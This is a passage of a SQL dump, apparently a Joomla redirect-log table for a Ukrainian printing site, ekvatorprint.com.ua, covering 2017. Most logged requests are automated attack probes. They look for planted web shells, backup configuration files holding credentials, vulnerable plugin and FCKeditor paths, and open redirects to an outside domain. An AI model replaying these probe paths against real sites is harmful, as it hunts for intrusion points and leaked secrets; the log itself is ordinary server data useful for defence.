00:00:00',301),(10168,'http://ekvatorprint.com.ua/index.php?date=2016-07-01&Itemid=13&option=com_dojo&p=1&r=16&view=dojoMap',NULL,'http://www.google.com/','',1,0,'2017-06-25 07:29:34','0000-00-00 00:00:00',301),(10169,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/backup.php','',1,0,'2017-06-25 09:24:33','0000-00-00 00:00:00',301),(10170,'http://ekvatorprint.com.ua/administrator/components/com_media/views/images/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_media/views/images/config.php','',1,0,'2017-06-25 09:28:44','0000-00-00 00:00:00',301),(10171,'http://ekvatorprint.com.ua/index.php?extid=1&extmode=view&Itemid=12&option=com_jcalpro',NULL,'http://www.google.com/','',1,0,'2017-06-25 11:42:58','0000-00-00 00:00:00',301),(10172,'http://ekvatorprint.com.ua/index.php?extid=1&extmode=view&format=ical&Itemid=12&option=com_jcalpro',NULL,'http://www.google.com/','',1,0,'2017-06-25 13:08:09','0000-00-00 00:00:00',301),(10173,'http://ekvatorprint.com.ua/index.php?id=2&Itemid=48&option=com_weblinks&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-25 14:32:47','0000-00-00 00:00:00',301),(10174,'http://ekvatorprint.com.ua/index.php?catid=12&Itemid=57&option=com_contact&view=category',NULL,'http://www.google.com/','',2,0,'2017-06-25 17:23:03','0000-00-00 00:00:00',301),(10175,'http://ekvatorprint.com.ua/index.php?id=20:airsoft-butikker-utlandet&Itemid=93&option=com_weblinks&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-26 00:28:57','0000-00-00 00:00:00',301),(10176,'http://ekvatorprint.com.ua/index.php?chronoformname=cis_user_registration&Itemid=93&option=com_chronocontact&task=send',NULL,'http://www.google.com/','',1,0,'2017-06-26 01:55:08','0000-00-00 00:00:00',301),(10177,'http://ekvatorprint.com.ua/component/artforms/index.php?formid=1&Itemid=11&option=com_artforms',NULL,'http://www.google.com/','',1,0,'2017-06-26 03:20:08','0000-00-00 00:00:00',301),(10178,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/config.php','',1,0,'2017-06-26 04:04:37','0000-00-00 00:00:00',301),(10179,'http://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&view=1',NULL,'http://www.google.com/','',1,0,'2017-06-26 04:44:09','0000-00-00 00:00:00',301),(10180,'http://ekvatorprint.com.ua/en/component/booking/index.php?option=com_booking&task=no_rb',NULL,'http://www.google.com/','',1,0,'2017-06-26 07:32:19','0000-00-00 00:00:00',301),(10181,'http://ekvatorprint.com.ua/bv.php',NULL,'','',6,0,'2017-06-26 07:53:28','0000-00-00 00:00:00',301),(10182,'http://ekvatorprint.com.ua/katalog-tovarov?send-form=Искать&app_id=1&controller=search&e[_itemname]=rlxraywh&exact=0&Itemid=131&limit=20&logic=and&option=com_zoo&order[field]=_none&order[mode]=s&order[order]=asc&task=filter&type=1',NULL,'http://www.google.com/','',1,0,'2017-06-26 10:20:44','0000-00-00 00:00:00',301),(10183,'http://ekvatorprint.com.ua/index.php?func=getCachedAddresses&option=com_dmk2maps&task=ajaxFunc',NULL,'http://www.google.com/','',1,0,'2017-06-26 11:44:41','0000-00-00 00:00:00',301),(10184,'http://ekvatorprint.com.ua/index.php/index.php?chronoformname=1&option=com_chronocontact&task=send',NULL,'http://www.google.com/','',1,0,'2017-06-26 14:34:16','0000-00-00 00:00:00',301),(10185,'http://ekvatorprint.com.ua/index.php/company/business-alliance/index.php?chronoformname=1&option=com_chronocontact&task=send',NULL,'http://www.google.com/','',1,0,'2017-06-26 17:23:37','0000-00-00 00:00:00',301),(10186,'http://ekvatorprint.com.ua/index.php?option=com_virtuemart&page=shop.browse&category_id=6&Itemid=54&category_id=6&flypage=flypage.tpl&Itemid=67&lang=en&option=com_virtuemart&page=shop.ask&product_id=1',NULL,'http://www.google.com/','',1,0,'2017-06-26 20:12:37','0000-00-00 00:00:00',301),(10187,'http://ekvatorprint.com.ua/albopretorio/index.php?connectionname=ricerca_archivio_accessibili&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&Itemid=5&option=com_chronoconnectivity2&start=&start=&start=&start=&start=&start=&start=&start=&start=',NULL,'http://www.google.com/','',9,0,'2017-06-26 21:37:04','0000-00-00 00:00:00',301),(10188,'http://ekvatorprint.com.ua/images/sn.php',NULL,'','',4,0,'2017-06-27 10:23:57','0000-00-00 00:00:00',301),(10189,'http://ekvatorprint.com.ua/albopretorio/index.php?connectionname=albo_pretorio&Itemid=&Itemid=&Itemid=&option=com_chronoconnectivity2&start=&start=&start=',NULL,'http://www.google.com/','',1,0,'2017-06-27 15:43:01','0000-00-00 00:00:00',301),(10190,'http://ekvatorprint.com.ua/is.php',NULL,'','',4,0,'2017-06-28 10:08:50','0000-00-00 00:00:00',301),(10191,'http://ekvatorprint.com.ua/administrator/wp-login.php',NULL,'','',3,0,'2017-06-28 20:30:28','0000-00-00 00:00:00',301),(10192,'http://ekvatorprint.com.ua/administrator/robots.txt',NULL,'','',3,0,'2017-06-28 20:30:32','0000-00-00 00:00:00',301),(10193,'http://ekvatorprint.com.ua/Tobey.php',NULL,'','',4,0,'2017-06-30 06:48:10','0000-00-00 00:00:00',301),(10194,'http://ekvatorprint.com.ua/comments.php',NULL,'','',2,0,'2017-06-30 15:29:06','0000-00-00 00:00:00',301),(10195,'http://ekvatorprint.com.ua/brandtalk/administrator/component/w6360n.php',NULL,'','',2,0,'2017-07-01 20:35:21','0000-00-00 00:00:00',301),(10196,'http://ekvatorprint.com.ua/sockarp.php?login=cmd',NULL,'','',3,0,'2017-07-02 12:01:55','0000-00-00 00:00:00',301),(10197,'http://ekvatorprint.com.ua/Configss.php?check=1',NULL,'','',3,0,'2017-07-03 15:39:58','0000-00-00 00:00:00',301),(10198,'http://ekvatorprint.com.ua/Marvin.php',NULL,'','',2,0,'2017-07-04 10:03:30','0000-00-00 00:00:00',301),(10199,'http://ekvatorprint.com.ua/path4.php?testwrite1=1',NULL,'','',3,0,'2017-07-06 13:17:11','0000-00-00 00:00:00',301),(10200,'http://ekvatorprint.com.ua/printing-on-canva',NULL,'','',2,0,'2017-07-07 07:17:54','0000-00-00 00:00:00',301),(10201,'http://ekvatorprint.com.ua/printing-on-viny',NULL,'','',1,0,'2017-07-07 08:25:05','0000-00-00 00:00:00',301),(10202,'http://ekvatorprint.com.ua/tmpe.php',NULL,'','',3,0,'2017-07-08 13:01:10','0000-00-00 00:00:00',301),(10203,'http://ekvatorprint.com.ua/wp-pas.php',NULL,'','',3,0,'2017-07-09 21:50:39','0000-00-00 00:00:00',301),(10204,'http://ekvatorprint.com.ua/Keith.php',NULL,'','',4,0,'2017-07-10 06:23:41','0000-00-00 00:00:00',301),(10205,'http://ekvatorprint.com.ua/index.php/using-joomla/extensions/components/users-component/registration-form',NULL,'','',2,0,'2017-07-10 15:42:02','0000-00-00 00:00:00',301),(10206,'http://ekvatorprint.com.ua/modules/mod_jmodule/index.html',NULL,'http://ekvatorprint.com.ua/modules/mod_jmodule/index.html','',1,0,'2017-07-10 19:42:41','0000-00-00 00:00:00',301),(10207,'http://ekvatorprint.com.ua/backup.bak.php',NULL,'','',3,0,'2017-07-11 06:35:18','0000-00-00 00:00:00',301),(10208,'http://ekvatorprint.com.ua/modules/mod_j2module/index.html',NULL,'http://ekvatorprint.com.ua/modules/mod_j2module/index.html','',1,0,'2017-07-12 16:10:51','0000-00-00 00:00:00',301),(10209,'http://ekvatorprint.com.ua/codules.php',NULL,'','',2,0,'2017-07-12 23:47:36','0000-00-00 00:00:00',301),(10210,'http://ekvatorprint.com.ua/wp-index.php',NULL,'','',3,0,'2017-07-13 09:05:07','0000-00-00 00:00:00',301),(10211,'http://ekvatorprint.com.ua/phqmv.php',NULL,'','',3,0,'2017-07-13 20:46:36','0000-00-00 00:00:00',301),(10212,'http://ekvatorprint.com.ua/google.php',NULL,'','',4,0,'2017-07-14 16:26:39','0000-00-00 00:00:00',301),(10213,'http://ekvatorprint.com.ua/ups.php',NULL,'http://ekvatorprint.com.ua/ups.php','',6,0,'2017-07-14 16:37:43','0000-00-00 00:00:00',301),(10214,'http://ekvatorprint.com.ua/wp-honor.php',NULL,'','',1,0,'2017-07-15 02:29:50','0000-00-00 00:00:00',301),(10215,'http://ekvatorprint.com.ua/wp-admin/setup-config.php',NULL,'','',12,0,'2017-07-15 04:58:49','0000-00-00 00:00:00',301),(10216,'http://ekvatorprint.com.ua/bgeiis.php',NULL,'','',3,0,'2017-07-15 12:44:30','0000-00-00 00:00:00',301),(10217,'http://ekvatorprint.com.ua/configuration.phpbkp',NULL,'','',1,0,'2017-07-16 03:25:46','0000-00-00 00:00:00',301),(10218,'http://ekvatorprint.com.ua/configuration.php-old',NULL,'','',1,0,'2017-07-16 03:25:46','0000-00-00 00:00:00',301),(10219,'http://ekvatorprint.com.ua/includes/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/includes/system_info.php.suspected','',1,0,'2017-07-18 02:19:30','0000-00-00 00:00:00',301),(10220,'http://ekvatorprint.com.ua/images/system_info.php',NULL,'http://ekvatorprint.com.ua/images/system_info.php','',1,0,'2017-07-18 02:19:54','0000-00-00 00:00:00',301),(10221,'http://ekvatorprint.com.ua/includes/system_info.php',NULL,'http://ekvatorprint.com.ua/includes/system_info.php','',1,0,'2017-07-18 02:19:56','0000-00-00 00:00:00',301),(10222,'http://ekvatorprint.com.ua/tmp/system_info.php',NULL,'http://ekvatorprint.com.ua/tmp/system_info.php','',1,0,'2017-07-18 03:27:21','0000-00-00 00:00:00',301),(10223,'http://ekvatorprint.com.ua/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/system_info.php.suspected','',2,0,'2017-07-18 03:29:52','0000-00-00 00:00:00',301),(10224,'http://ekvatorprint.com.ua/images/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/images/system_info.php.suspected','',1,0,'2017-07-18 03:30:35','0000-00-00 00:00:00',301),(10225,'http://ekvatorprint.com.ua/layouts/system_info.php',NULL,'http://ekvatorprint.com.ua/layouts/system_info.php','',1,0,'2017-07-18 04:33:09','0000-00-00 00:00:00',301),(10226,'http://ekvatorprint.com.ua/cache/system_info.php',NULL,'http://ekvatorprint.com.ua/cache/system_info.php','',1,0,'2017-07-18 05:40:38','0000-00-00 00:00:00',301),(10227,'http://ekvatorprint.com.ua/templates/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/templates/system_info.php.suspected','',1,0,'2017-07-18 06:47:56','0000-00-00 00:00:00',301),(10228,'http://ekvatorprint.com.ua/logs/system_info.php',NULL,'http://ekvatorprint.com.ua/logs/system_info.php','',1,0,'2017-07-18 06:55:58','0000-00-00 00:00:00',301),(10229,'http://ekvatorprint.com.ua/cache/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/cache/system_info.php.suspected','',1,0,'2017-07-18 07:05:19','0000-00-00 00:00:00',301),(10230,'http://ekvatorprint.com.ua/cli/system_info.php',NULL,'http://ekvatorprint.com.ua/cli/system_info.php','',1,0,'2017-07-18 07:57:01','0000-00-00 00:00:00',301),(10231,'http://ekvatorprint.com.ua/plugins/system_info.php',NULL,'http://ekvatorprint.com.ua/plugins/system_info.php','',1,0,'2017-07-18 07:57:37','0000-00-00 00:00:00',301),(10232,'http://ekvatorprint.com.ua/layouts/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/layouts/system_info.php.suspected','',1,0,'2017-07-18 09:03:14','0000-00-00 00:00:00',301),(10233,'http://ekvatorprint.com.ua/language/system_info.php',NULL,'http://ekvatorprint.com.ua/language/system_info.php','',1,0,'2017-07-18 09:03:28','0000-00-00 00:00:00',301),(10234,'http://ekvatorprint.com.ua/administrator/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/system_info.php.suspected','',1,0,'2017-07-18 09:05:38','0000-00-00 00:00:00',301),(10235,'http://ekvatorprint.com.ua/system_info.php',NULL,'http://ekvatorprint.com.ua/system_info.php','',3,0,'2017-07-18 09:05:44','0000-00-00 00:00:00',301),(10236,'http://ekvatorprint.com.ua/media/system_info.php',NULL,'http://ekvatorprint.com.ua/media/system_info.php','',1,0,'2017-07-18 09:06:49','0000-00-00 00:00:00',301),(10237,'http://ekvatorprint.com.ua/cli/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/cli/system_info.php.suspected','',1,0,'2017-07-18 09:06:54','0000-00-00 00:00:00',301),(10238,'http://ekvatorprint.com.ua/modules/system_info.php',NULL,'http://ekvatorprint.com.ua/modules/system_info.php','',1,0,'2017-07-18 09:10:21','0000-00-00 00:00:00',301),(10239,'http://ekvatorprint.com.ua/components/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/components/system_info.php.suspected','',1,0,'2017-07-18 11:14:05','0000-00-00 00:00:00',301),(10240,'http://ekvatorprint.com.ua/libraries/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/system_info.php.suspected','',1,0,'2017-07-18 14:38:55','0000-00-00 00:00:00',301),(10241,'http://ekvatorprint.com.ua/components/system_info.php',NULL,'http://ekvatorprint.com.ua/components/system_info.php','',1,0,'2017-07-18 15:45:47','0000-00-00 00:00:00',301),(10242,'http://ekvatorprint.com.ua/language/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/language/system_info.php.suspected','',1,0,'2017-07-18 15:46:55','0000-00-00 00:00:00',301),(10243,'http://ekvatorprint.com.ua/modules/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/system_info.php.suspected','',1,0,'2017-07-18 18:47:47','0000-00-00 00:00:00',301),(10244,'http://ekvatorprint.com.ua/layouts/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/layouts/logo_img.php.suspected','',5,0,'2017-07-18 23:15:33','0000-00-00 00:00:00',301),(10245,'http://ekvatorprint.com.ua/modules/mod_articless/html.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/html.php','',1,0,'2017-07-19 04:29:03','0000-00-00 00:00:00',301),(10246,'http://ekvatorprint.com.ua/cache/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/cache/logo_img.php.suspected','',6,0,'2017-07-19 06:58:21','0000-00-00 00:00:00',301),(10247,'http://ekvatorprint.com.ua/libraries/system_info.php',NULL,'http://ekvatorprint.com.ua/libraries/system_info.php','',7,0,'2017-07-19 12:31:08','0000-00-00 00:00:00',301),(10248,'http://ekvatorprint.com.ua/bin/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/bin/system_info.php.suspected','',1,0,'2017-07-19 13:42:26','0000-00-00 00:00:00',301),(10249,'http://ekvatorprint.com.ua/templates/system_info.php',NULL,'http://ekvatorprint.com.ua/templates/system_info.php','',1,0,'2017-07-19 13:45:14','0000-00-00 00:00:00',301),(10250,'http://ekvatorprint.com.ua/media/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/media/system_info.php.suspected','',1,0,'2017-07-19 15:53:50','0000-00-00 00:00:00',301),(10251,'http://ekvatorprint.com.ua/wp-config_bak.php?x=1',NULL,'','',3,0,'2017-07-19 16:24:00','0000-00-00 00:00:00',301),(10252,'http://ekvatorprint.com.ua/jactive.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-07-20 11:12:58','0000-00-00 00:00:00',301),(10253,'http://ekvatorprint.com.ua/tmp/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/tmp/system_info.php.suspected','',1,0,'2017-07-20 11:14:29','0000-00-00 00:00:00',301),(10254,'http://ekvatorprint.com.ua/plugins/system_info.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/system_info.php.suspected','',1,0,'2017-07-20 13:39:53','0000-00-00 00:00:00',301),(10255,'http://ekvatorprint.com.ua/modules/mod_artuploader/js/ajaxupload.js',NULL,'http://ekvatorprint.com.ua/modules/mod_artuploader/js/ajaxupload.js','',8,0,'2017-07-20 15:37:32','0000-00-00 00:00:00',301),(10256,'http://ekvatorprint.com.ua/function-sync.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-07-20 23:28:24','0000-00-00 00:00:00',301),(10257,'http://ekvatorprint.com.ua/protal/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-21 02:38:16','0000-00-00 00:00:00',301),(10258,'http://ekvatorprint.com.ua/press/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-21 02:38:17','0000-00-00 00:00:00',301),(10259,'http://ekvatorprint.com.ua/main/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-21 02:38:17','0000-00-00 00:00:00',301),(10260,'http://ekvatorprint.com.ua/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php','',1,0,'2017-07-21 05:17:03','0000-00-00 00:00:00',301),(10261,'http://ekvatorprint.com.ua/cms/wp-includes/wlwmanifest.xml',NULL,'','',83,0,'2017-07-23 19:53:37','0000-00-00 00:00:00',301),(10262,'http://ekvatorprint.com.ua/ads.txt',NULL,'','',1447,0,'2017-07-24 09:08:24','0000-00-00 00:00:00',301),(10263,'http://ekvatorprint.com.ua//js/admin.js',NULL,'','',2,0,'2017-07-25 12:15:20','0000-00-00 00:00:00',301),(10264,'http://ekvatorprint.com.ua/wp-content/plugins/wp-vertical-gallery/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-vertical-gallery/readme.txt','',8,0,'2017-07-26 01:04:38','0000-00-00 00:00:00',301),(10265,'http://ekvatorprint.com.ua/forum/rd.php?http://exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:23','0000-00-00 00:00:00',301),(10266,'http://ekvatorprint.com.ua/go.php?exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:23','0000-00-00 00:00:00',301),(10267,'http://ekvatorprint.com.ua/go.php?http://exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:24','0000-00-00 00:00:00',301),(10268,'http://ekvatorprint.com.ua/go.php?to=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:25','0000-00-00 00:00:00',301),(10269,'http://ekvatorprint.com.ua/http:/exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:29','0000-00-00 00:00:00',301),(10270,'http://ekvatorprint.com.ua/links.php?id=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:42','0000-00-00 00:00:00',301),(10271,'http://ekvatorprint.com.ua/links/links.php?id=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:44','0000-00-00 00:00:00',301),(10272,'http://ekvatorprint.com.ua/redirect.php?url=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:47','0000-00-00 00:00:00',301),(10273,'http://ekvatorprint.com.ua/partners.php?page=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:48','0000-00-00 00:00:00',301),(10274,'http://ekvatorprint.com.ua/extlink.php?url=exkdhhftt.ru',NULL,'','',1,0,'2017-07-30 20:30:49','0000-00-00 00:00:00',301),(10275,'http://ekvatorprint.com.ua/cache/script.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-07-31 11:48:02','0000-00-00 00:00:00',301),(10276,'http://ekvatorprint.com.ua/wp-content/script.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-07-31 11:48:38','0000-00-00 00:00:00',301),(10277,'http://ekvatorprint.com.ua/libraries/script.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-07-31 11:48:53','0000-00-00 00:00:00',301),(10278,'http://ekvatorprint.com.ua/joomla/media/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',9,0,'2017-07-31 15:00:32','0000-00-00 00:00:00',301),(10279,'http://ekvatorprint.com.ua/news/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10280,'http://ekvatorprint.com.ua/editorold/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10281,'http://ekvatorprint.com.ua/home/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10282,'http://ekvatorprint.com.ua/javascript/editors/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10283,'http://ekvatorprint.com.ua/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10284,'http://ekvatorprint.com.ua/scripts/fckeditor/editor/dialog/fck_about.html',NULL,'','',2,0,'2017-07-31 23:06:13','0000-00-00 00:00:00',301),(10285,'http://ekvatorprint.com.ua/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:14','0000-00-00 00:00:00',301),(10286,'http://ekvatorprint.com.ua/js/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10287,'http://ekvatorprint.com.ua/editor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10288,'http://ekvatorprint.com.ua/inc/news/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10289,'http://ekvatorprint.com.ua/js/admin/templates/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10290,'http://ekvatorprint.com.ua/html/js/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10291,'http://ekvatorprint.com.ua/js/editor/FCKeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10292,'http://ekvatorprint.com.ua/editor1/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10293,'http://ekvatorprint.com.ua/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10294,'http://ekvatorprint.com.ua/modules/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10295,'http://ekvatorprint.com.ua/data/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10296,'http://ekvatorprint.com.ua/inc/new/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10297,'http://ekvatorprint.com.ua/Fckeditornew/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:15','0000-00-00 00:00:00',301),(10298,'http://ekvatorprint.com.ua/inc/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10299,'http://ekvatorprint.com.ua/javascript/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10300,'http://ekvatorprint.com.ua/js/plugins/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10301,'http://ekvatorprint.com.ua/js/lib/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10302,'http://ekvatorprint.com.ua/system/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10303,'http://ekvatorprint.com.ua/js/data/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10304,'http://ekvatorprint.com.ua/include/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10305,'http://ekvatorprint.com.ua/main/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10306,'http://ekvatorprint.com.ua/new/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10307,'http://ekvatorprint.com.ua/administartor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:16','0000-00-00 00:00:00',301),(10308,'http://ekvatorprint.com.ua/inc/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10309,'http://ekvatorprint.com.ua/js/modules/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10310,'http://ekvatorprint.com.ua/templates/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10311,'http://ekvatorprint.com.ua/fck/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10312,'http://ekvatorprint.com.ua/support/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10313,'http://ekvatorprint.com.ua/js/home/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:21','0000-00-00 00:00:00',301),(10314,'http://ekvatorprint.com.ua/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-07-31 23:06:22','0000-00-00 00:00:00',301),(10315,'http://ekvatorprint.com.ua/modules/mod_ariimageesws/mod_ariimageesws.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageesws/mod_ariimageesws.php','',1,0,'2017-08-01 18:40:06','0000-00-00 00:00:00',301),(10316,'http://ekvatorprint.com.ua/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=1',NULL,'http://www.google.com/','',1,0,'2017-08-02 14:54:10','0000-00-00 00:00:00',301),(10317,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/html.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/html.php','',1,0,'2017-08-02 15:14:21','0000-00-00 00:00:00',301),(10318,'http://ekvatorprint.com.ua/stylesheet.css',NULL,'','',1,0,'2017-08-02 18:41:40','0000-00-00 00:00:00',301),(10319,'http://ekvatorprint.com.ua/LICENSE',NULL,'','',1,0,'2017-08-02 18:43:45','0000-00-00 00:00:00',301),(10320,'http://ekvatorprint.com.ua/config.php.suspected',NULL,'http://ekvatorprint.com.ua/config.php.suspected','',2,0,'2017-08-04 09:37:20','0000-00-00 00:00:00',301),(10321,'http://ekvatorprint.com.ua/path/lndex.php.suspected',NULL,'http://ekvatorprint.com.ua/path/lndex.php.suspected','',1,0,'2017-08-04 09:51:05','0000-00-00 00:00:00',301),(10322,'http://ekvatorprint.com.ua/support.php.suspected',NULL,'http://ekvatorprint.com.ua/support.php.suspected','',1,0,'2017-08-04 09:54:21','0000-00-00 00:00:00',301),(10323,'http://ekvatorprint.com.ua/db.php.suspected',NULL,'http://ekvatorprint.com.ua/db.php.suspected','',13,0,'2017-08-04 10:04:55','0000-00-00 00:00:00',301),(10324,'http://ekvatorprint.com.ua/logs/logs.php.suspected',NULL,'http://ekvatorprint.com.ua/logs/logs.php.suspected','',1,0,'2017-08-04 11:05:52','0000-00-00 00:00:00',301),(10325,'http://ekvatorprint.com.ua/lndex.php.suspected',NULL,'http://ekvatorprint.com.ua/lndex.php.suspected','',1,0,'2017-08-04 12:23:30','0000-00-00 00:00:00',301),(10326,'http://ekvatorprint.com.ua/modx.php.suspected',NULL,'http://ekvatorprint.com.ua/modx.php.suspected','',1,0,'2017-08-04 12:24:11','0000-00-00 00:00:00',301),(10327,'http://ekvatorprint.com.ua/inc.php.suspected',NULL,'http://ekvatorprint.com.ua/inc.php.suspected','',1,0,'2017-08-04 12:24:43','0000-00-00 00:00:00',301),(10328,'http://ekvatorprint.com.ua/printing-on-canavas',NULL,'','',1,0,'2017-08-04 14:10:22','0000-00-00 00:00:00',301),(10329,'http://ekvatorprint.com.ua/images/shwso.php.suspected',NULL,'http://ekvatorprint.com.ua/images/shwso.php.suspected','',1,0,'2017-08-04 14:50:22','0000-00-00 00:00:00',301),(10330,'http://ekvatorprint.com.ua/security.php.suspected',NULL,'http://ekvatorprint.com.ua/security.php.suspected','',1,0,'2017-08-04 14:52:23','0000-00-00 00:00:00',301),(10331,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/profile/htaccess.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/profile/htaccess.php.suspected','',1,0,'2017-08-04 14:52:29','0000-00-00 00:00:00',301),(10332,'http://ekvatorprint.com.ua/images/mod_config.php.suspected',NULL,'http://ekvatorprint.com.ua/images/mod_config.php.suspected','',3,0,'2017-08-04 14:53:24','0000-00-00 00:00:00',301),(10333,'http://ekvatorprint.com.ua/modules/mod_bing/mod_bing.php',NULL,'http://ekvatorprint.com.ua/modules/mod_bing/mod_bing.php','',1,0,'2017-08-04 15:17:16','0000-00-00 00:00:00',301),(10334,'http://ekvatorprint.com.ua/images/upa.php',NULL,'','',2,0,'2017-08-04 15:47:48','0000-00-00 00:00:00',301),(10335,'http://ekvatorprint.com.ua/defined.php.suspected',NULL,'http://ekvatorprint.com.ua/defined.php.suspected','',1,0,'2017-08-04 16:03:29','0000-00-00 